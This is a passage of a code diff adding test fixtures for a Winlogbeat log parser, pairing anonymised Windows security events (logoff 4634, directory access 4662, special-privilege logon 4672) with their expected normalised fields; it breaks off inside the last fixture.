"{\"@timestamp\":\"2024-11-12T08:42:47.895Z\",\"event\":{\"action\":\"Logoff\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4634\",\"created\":\"2024-11-12T08:42:48.190Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"An account was logged off.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tJ_DOE\\n\\tLogon ID:\\t\\t0x5ED35BB6\\n\\nLogon Type:\\t\\t\\t3\\n\\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.\"},\"message\":\"An account was logged off.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tJ_DOE\\n\\tLogon ID:\\t\\t0x5ED35BB6\\n\\nLogon Type:\\t\\t\\t3\\n\\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"Logoff\",\"channel\":\"Security\",\"process\":{\"pid\":704,\"thread\":{\"id\":6336}},\"event_data\":{\"TargetUserName\":\"ACCOUNT\",\"TargetLogonId\":\"0x5ed35bb6\",\"TargetUserSid\":\"S-1-2-3\",\"LogonType\":\"3\",\"TargetDomainName\":\"J_DOE\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.jdoe.com\",\"record_id\":15983780774,\"event_id\":\"4634\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\",\"5.6.7.8\"]}}", + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + } + }, + "expected": { + "message": "{\"@timestamp\":\"2024-11-12T08:42:47.895Z\",\"event\":{\"action\":\"Logoff\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4634\",\"created\":\"2024-11-12T08:42:48.190Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"An account was logged off.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tJ_DOE\\n\\tLogon ID:\\t\\t0x5ED35BB6\\n\\nLogon Type:\\t\\t\\t3\\n\\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.\"},\"message\":\"An account was logged off.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tJ_DOE\\n\\tLogon ID:\\t\\t0x5ED35BB6\\n\\nLogon Type:\\t\\t\\t3\\n\\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"Logoff\",\"channel\":\"Security\",\"process\":{\"pid\":704,\"thread\":{\"id\":6336}},\"event_data\":{\"TargetUserName\":\"ACCOUNT\",\"TargetLogonId\":\"0x5ed35bb6\",\"TargetUserSid\":\"S-1-2-3\",\"LogonType\":\"3\",\"TargetDomainName\":\"J_DOE\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.jdoe.com\",\"record_id\":15983780774,\"event_id\":\"4634\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\",\"5.6.7.8\"]}}", + "event": { + "action": "Logoff", + "code": "4634", + "kind": "event", + "module": "security", + "original": "An account was logged off.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tACCOUNT\n\tAccount Domain:\t\tJ_DOE\n\tLogon ID:\t\t0x5ED35BB6\n\nLogon Type:\t\t\t3\n\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T08:42:47.895000Z", + "action": { + "id": 4634, + "outcome": "success", + "properties": { + "LogonType": "3", + "TargetDomainName": "J_DOE", + "TargetLogonId": "0x5ed35bb6", + "TargetUserName": "ACCOUNT", + "TargetUserSid": "S-1-2-3" + } + }, + "agent": { + "ephemeral_id": "11111111-2222-3333-4444-555555555555", + "id": "12345678-abcd-ef90-1234-abcdef123456", + "name": "PC01", + "type": "filebeat", + "version": "8.14.1" + }, + "host": { + "architecture": "x86_64", + "hostname": "pc01", + "id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee", + "ip": [ + "1.2.3.4", + "5.6.7.8" + ], + "mac": [ + "00-11-22-33-44-55" + ], + "name": "pc01", + "os": { + "build": "17763.6414", + "family": "windows", + "kernel": "10.0.17763.6414 (WinBuild.160101.0800)", + "name": "Windows Server 2019 Standard", + "platform": "windows", + "type": "windows", + "version": "10.0" + } + }, + "log": { + "level": "information" + }, + "related": { + "hosts": [ + "pc01" + ], + "ip": [ + "1.2.3.4", + "5.6.7.8" + ], + "user": [ + "ACCOUNT" + ] + }, + "user": { + "domain": "J_DOE", + "id": "S-1-2-3", + "name": "ACCOUNT", + "target": { + "domain": "J_DOE", + "name": "ACCOUNT" + } + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "PC01.jdoe.com", + "event_id": "4634", + "keywords": [ + "Audit Success" + ], + "logon": { + "id": "0x5ed35bb6", + "type": "Network" + }, + "opcode": "Info", + "process": { + "pid": 704, + "thread": { + "id": 6336 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "15983780774", + "task": "Logoff" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4662.json b/Beats/winlogbeat/tests/security_event_4662.json new file mode 100644 index 000000000..3f1de8e53 --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4662.json @@ -0,0 +1,105 @@ +{ + "input": { + "message": "{\"log\":{\"level\":\"information\"},\"@timestamp\":\"2024-11-12T09:07:11.844Z\",\"message\":\"Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0xC2B9D138\\n\\nObjet :\\n\\tServeur de l\u2019objet :\\t\\tDS\\n\\tType d\u2019objet :\\t\\t%{11111111-aaaa-2222-bbbb-333333333333}\\n\\tNom de l\u2019objet :\\t\\t%{12345678-abcd-ef90-1234-abcdef123456}\\n\\tID du handle :\\t\\t0x0\\n\\nOp\u00e9ration :\\n\\tType d\u2019op\u00e9ration :\\t\\tObject Access\\n\\tAcc\u00e8s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t\\t\\t\\n\\tMasque d\u2019acc\u00e8s :\\t\\t0x100\\n\\tPropri\u00e9t\u00e9s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\\n\\n\\nInformations suppl\u00e9mentaires :\\n\\tParam\u00e8tre 1:\\t\\t-\\n\\tParam\u00e8tre 2 :\\t\\t\",\"tags\":[\"beats_input_codec_plain_applied\"],\"event\":{\"created\":\"2024-11-12T09:07:13.714Z\",\"action\":\"Directory Service Access\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"outcome\":\"success\",\"code\":\"4662\",\"original\":\"Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0xC2B9D138\\n\\nObjet :\\n\\tServeur de l\u2019objet :\\t\\tDS\\n\\tType d\u2019objet :\\t\\t%{11111111-aaaa-2222-bbbb-333333333333}\\n\\tNom de l\u2019objet :\\t\\t%{12345678-abcd-ef90-1234-abcdef123456}\\n\\tID du handle :\\t\\t0x0\\n\\nOp\u00e9ration :\\n\\tType d\u2019op\u00e9ration :\\t\\tObject Access\\n\\tAcc\u00e8s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t\\t\\t\\n\\tMasque d\u2019acc\u00e8s :\\t\\t0x100\\n\\tPropri\u00e9t\u00e9s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\\n\\n\\nInformations suppl\u00e9mentaires :\\n\\tParam\u00e8tre 1:\\t\\t-\\n\\tParam\u00e8tre 2 :\\t\\t\",\"kind\":\"event\"},\"@version\":\"1\",\"agent\":{\"name\":\"ACCOUNT01\",\"ephemeral_id\":\"12345678-1234-5678-9012-345678901234\",\"type\":\"winlogbeat\",\"version\":\"8.12.2\",\"id\":\"abcdefab-cdef-abcd-efab-cdefabcdefab\"},\"host\":{\"hostname\":\"account01\",\"mac\":[\"00-11-22-33-44-55\"],\"architecture\":\"x86_64\",\"id\":\"11111111-2222-aaaa-bbbb-333333333333\",\"name\":\"account01\",\"ip\":[\"1.2.3.4\"],\"os\":{\"type\":\"windows\",\"build\":\"17763.6414\",\"name\":\"Windows Server 2019 Standard\",\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"platform\":\"windows\",\"version\":\"10.0\",\"family\":\"windows\"}},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"api\":\"wineventlog\",\"channel\":\"Security\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"task\":\"Directory Service Access\",\"process\":{\"pid\":744,\"thread\":{\"id\":864}},\"record_id\":476080242,\"event_id\":\"4662\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"opcode\":\"Informations\",\"computer_name\":\"ACCOUNT01.domain.local\",\"event_data\":{\"HandleId\":\"0x0\",\"SubjectLogonId\":\"0xc2b9d138\",\"ObjectType\":\"%{11111111-aaaa-2222-bbbb-333333333333}\",\"ObjectServer\":\"DS\",\"OperationType\":\"Object Access\",\"SubjectUserSid\":\"S-1-2-3\",\"AdditionalInfo\":\"-\",\"AccessMask\":\"0x100\",\"SubjectDomainName\":\"DOMAIN\",\"ObjectName\":\"%{12345678-abcd-ef90-1234-abcdef123456}\",\"SubjectUserName\":\"ACCOUNT01$\",\"AccessList\":\"%%7688\\n\\t\\t\\t\\t\",\"Properties\":\"%%7688\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\"}}}", + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + } + }, + "expected": { + "message": "{\"log\":{\"level\":\"information\"},\"@timestamp\":\"2024-11-12T09:07:11.844Z\",\"message\":\"Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0xC2B9D138\\n\\nObjet :\\n\\tServeur de l\u2019objet :\\t\\tDS\\n\\tType d\u2019objet :\\t\\t%{11111111-aaaa-2222-bbbb-333333333333}\\n\\tNom de l\u2019objet :\\t\\t%{12345678-abcd-ef90-1234-abcdef123456}\\n\\tID du handle :\\t\\t0x0\\n\\nOp\u00e9ration :\\n\\tType d\u2019op\u00e9ration :\\t\\tObject Access\\n\\tAcc\u00e8s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t\\t\\t\\n\\tMasque d\u2019acc\u00e8s :\\t\\t0x100\\n\\tPropri\u00e9t\u00e9s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\\n\\n\\nInformations suppl\u00e9mentaires :\\n\\tParam\u00e8tre 1:\\t\\t-\\n\\tParam\u00e8tre 2 :\\t\\t\",\"tags\":[\"beats_input_codec_plain_applied\"],\"event\":{\"created\":\"2024-11-12T09:07:13.714Z\",\"action\":\"Directory Service Access\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"outcome\":\"success\",\"code\":\"4662\",\"original\":\"Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0xC2B9D138\\n\\nObjet :\\n\\tServeur de l\u2019objet :\\t\\tDS\\n\\tType d\u2019objet :\\t\\t%{11111111-aaaa-2222-bbbb-333333333333}\\n\\tNom de l\u2019objet :\\t\\t%{12345678-abcd-ef90-1234-abcdef123456}\\n\\tID du handle :\\t\\t0x0\\n\\nOp\u00e9ration :\\n\\tType d\u2019op\u00e9ration :\\t\\tObject Access\\n\\tAcc\u00e8s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t\\t\\t\\n\\tMasque d\u2019acc\u00e8s :\\t\\t0x100\\n\\tPropri\u00e9t\u00e9s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\\n\\n\\nInformations suppl\u00e9mentaires :\\n\\tParam\u00e8tre 1:\\t\\t-\\n\\tParam\u00e8tre 2 :\\t\\t\",\"kind\":\"event\"},\"@version\":\"1\",\"agent\":{\"name\":\"ACCOUNT01\",\"ephemeral_id\":\"12345678-1234-5678-9012-345678901234\",\"type\":\"winlogbeat\",\"version\":\"8.12.2\",\"id\":\"abcdefab-cdef-abcd-efab-cdefabcdefab\"},\"host\":{\"hostname\":\"account01\",\"mac\":[\"00-11-22-33-44-55\"],\"architecture\":\"x86_64\",\"id\":\"11111111-2222-aaaa-bbbb-333333333333\",\"name\":\"account01\",\"ip\":[\"1.2.3.4\"],\"os\":{\"type\":\"windows\",\"build\":\"17763.6414\",\"name\":\"Windows Server 2019 Standard\",\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"platform\":\"windows\",\"version\":\"10.0\",\"family\":\"windows\"}},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"api\":\"wineventlog\",\"channel\":\"Security\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"task\":\"Directory Service Access\",\"process\":{\"pid\":744,\"thread\":{\"id\":864}},\"record_id\":476080242,\"event_id\":\"4662\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"opcode\":\"Informations\",\"computer_name\":\"ACCOUNT01.domain.local\",\"event_data\":{\"HandleId\":\"0x0\",\"SubjectLogonId\":\"0xc2b9d138\",\"ObjectType\":\"%{11111111-aaaa-2222-bbbb-333333333333}\",\"ObjectServer\":\"DS\",\"OperationType\":\"Object Access\",\"SubjectUserSid\":\"S-1-2-3\",\"AdditionalInfo\":\"-\",\"AccessMask\":\"0x100\",\"SubjectDomainName\":\"DOMAIN\",\"ObjectName\":\"%{12345678-abcd-ef90-1234-abcdef123456}\",\"SubjectUserName\":\"ACCOUNT01$\",\"AccessList\":\"%%7688\\n\\t\\t\\t\\t\",\"Properties\":\"%%7688\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\"}}}", + "event": { + "action": "Directory Service Access", + "code": "4662", + "kind": "event", + "module": "security", + "original": "Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\n\nSujet :\n\tID de s\u00e9curit\u00e9 :\t\tS-1-2-3\n\tNom du compte :\t\tACCOUNT01$\n\tDomaine du compte :\t\tDOMAIN\n\tID d\u2019ouverture de session :\t\t0xC2B9D138\n\nObjet :\n\tServeur de l\u2019objet :\t\tDS\n\tType d\u2019objet :\t\t%{11111111-aaaa-2222-bbbb-333333333333}\n\tNom de l\u2019objet :\t\t%{12345678-abcd-ef90-1234-abcdef123456}\n\tID du handle :\t\t0x0\n\nOp\u00e9ration :\n\tType d\u2019op\u00e9ration :\t\tObject Access\n\tAcc\u00e8s :\t\tContr\u00f4ler l\u2019acc\u00e8s\n\t\t\t\t\n\tMasque d\u2019acc\u00e8s :\t\t0x100\n\tPropri\u00e9t\u00e9s :\t\tContr\u00f4ler l\u2019acc\u00e8s\n\t\t{abcdefab-1234-cdef-5678-901234abcdef}\n\t{11111111-aaaa-2222-bbbb-333333333333}\n\n\nInformations suppl\u00e9mentaires :\n\tParam\u00e8tre 1:\t\t-\n\tParam\u00e8tre 2 :\t\t", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T09:07:11.844000Z", + "action": { + "id": 4662, + "outcome": "success", + "properties": { + "AccessList": "%%7688\n\t\t\t\t", + "AccessMask": "0x100", + "AdditionalInfo": "-", + "HandleId": "0x0", + "ObjectName": "%{12345678-abcd-ef90-1234-abcdef123456}", + "ObjectServer": "DS", + "ObjectType": "%{11111111-aaaa-2222-bbbb-333333333333}", + "OperationType": "Object Access", + "Properties": "%%7688\n\t\t{abcdefab-1234-cdef-5678-901234abcdef}\n\t{11111111-aaaa-2222-bbbb-333333333333}", + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0xc2b9d138", + "SubjectUserName": "ACCOUNT01$", + "SubjectUserSid": "S-1-2-3" + } + }, + "agent": { + "ephemeral_id": "12345678-1234-5678-9012-345678901234", + "id": "abcdefab-cdef-abcd-efab-cdefabcdefab", + "name": "ACCOUNT01", + "type": "winlogbeat", + "version": "8.12.2" + }, + "host": { + "architecture": "x86_64", + "hostname": "account01", + "id": "11111111-2222-aaaa-bbbb-333333333333", + "ip": [ + "1.2.3.4" + ], + "mac": [ + "00-11-22-33-44-55" + ], + "name": "account01", + "os": { + "build": "17763.6414", + "family": "windows", + "kernel": "10.0.17763.6414 (WinBuild.160101.0800)", + "name": "Windows Server 2019 Standard", + "platform": "windows", + "type": "windows", + "version": "10.0" + } + }, + "log": { + "level": "information" + }, + "related": { + "hosts": [ + "account01" + ], + "ip": [ + "1.2.3.4" + ] + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "ACCOUNT01.domain.local", + "event_id": "4662", + "keywords": [ + "Succ\u00e8s de l\u2019audit" + ], + "logon": { + "id": "0xc2b9d138" + }, + "opcode": "Informations", + "process": { + "pid": 744, + "thread": { + "id": 864 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "476080242", + "task": "Directory Service Access" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4672.json b/Beats/winlogbeat/tests/security_event_4672.json new file mode 100644 index 000000000..ec935a02c --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4672.json @@ -0,0 +1,82 @@ +{ + "input": { + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tUSER01-WIN$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x40C158B6\\n\\nPrivil\u00e8ges :\\t\\tSeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"code\":\"4672\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:08:54.122Z\",\"action\":\"Special Logon\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:08:50.647Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tUSER01-WIN$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x40C158B6\\n\\nPrivil\u00e8ges :\\t\\tSeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"host\":{\"name\":\"USER01-WIN.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"Special Logon\",\"computer_name\":\"USER01-WIN.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"activity_id\":\"{abcdefab-1234-cdef-5678-901234abcdef}\",\"event_data\":{\"SubjectLogonId\":\"0x40c158b6\",\"PrivilegeList\":\"SeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"USER01-WIN$\",\"SubjectUserSid\":\"S-1-2-3\"},\"process\":{\"thread\":{\"id\":27812},\"pid\":828},\"event_id\":\"4672\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":288206963},\"@version\":\"1\"}", + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + } + }, + "expected": { + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tUSER01-WIN$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x40C158B6\\n\\nPrivil\u00e8ges :\\t\\tSeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"code\":\"4672\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:08:54.122Z\",\"action\":\"Special Logon\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:08:50.647Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tUSER01-WIN$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x40C158B6\\n\\nPrivil\u00e8ges :\\t\\tSeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"host\":{\"name\":\"USER01-WIN.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"Special Logon\",\"computer_name\":\"USER01-WIN.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"activity_id\":\"{abcdefab-1234-cdef-5678-901234abcdef}\",\"event_data\":{\"SubjectLogonId\":\"0x40c158b6\",\"PrivilegeList\":\"SeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"USER01-WIN$\",\"SubjectUserSid\":\"S-1-2-3\"},\"process\":{\"thread\":{\"id\":27812},\"pid\":828},\"event_id\":\"4672\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":288206963},\"@version\":\"1\"}", + "event": { + "action": "Special Logon", + "code": "4672", + 